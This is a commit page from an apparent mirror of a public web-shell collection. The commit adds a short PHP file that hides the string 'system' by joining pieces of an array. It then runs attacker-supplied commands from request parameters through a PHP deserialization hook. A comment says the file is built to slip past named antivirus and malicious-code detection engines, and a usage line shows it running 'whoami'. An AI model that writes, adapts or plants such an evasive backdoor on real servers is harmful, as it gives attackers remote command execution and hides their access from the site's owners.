mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
Create system2022-08-22-2.php
from: https://zhuanlan.zhihu.com/p/550150061 usage: xxx.php?1[]=system&1[]=a&1[]=b&2=whoami
This commit is contained in:
14
php/system2022-08-22-2.php
Normal file
14
php/system2022-08-22-2.php
Normal file
@@ -0,0 +1,14 @@
|
|||||||
|
<?php
|
||||||
|
//bypass 牧云 and TAV反病毒引擎+洋葱恶意代码检测引擎
|
||||||
|
class A{
|
||||||
|
public function __construct(){}
|
||||||
|
|
||||||
|
public function __wakeup(){
|
||||||
|
$b = $_GET[1];
|
||||||
|
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
|
||||||
|
$a = join($result);
|
||||||
|
Closure::fromCallable($a)->__invoke($_REQUEST[2]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
@unserialize('O:1:"A":1:{s:10:" A comment";N;}');
|
||||||
Reference in New Issue
Block a user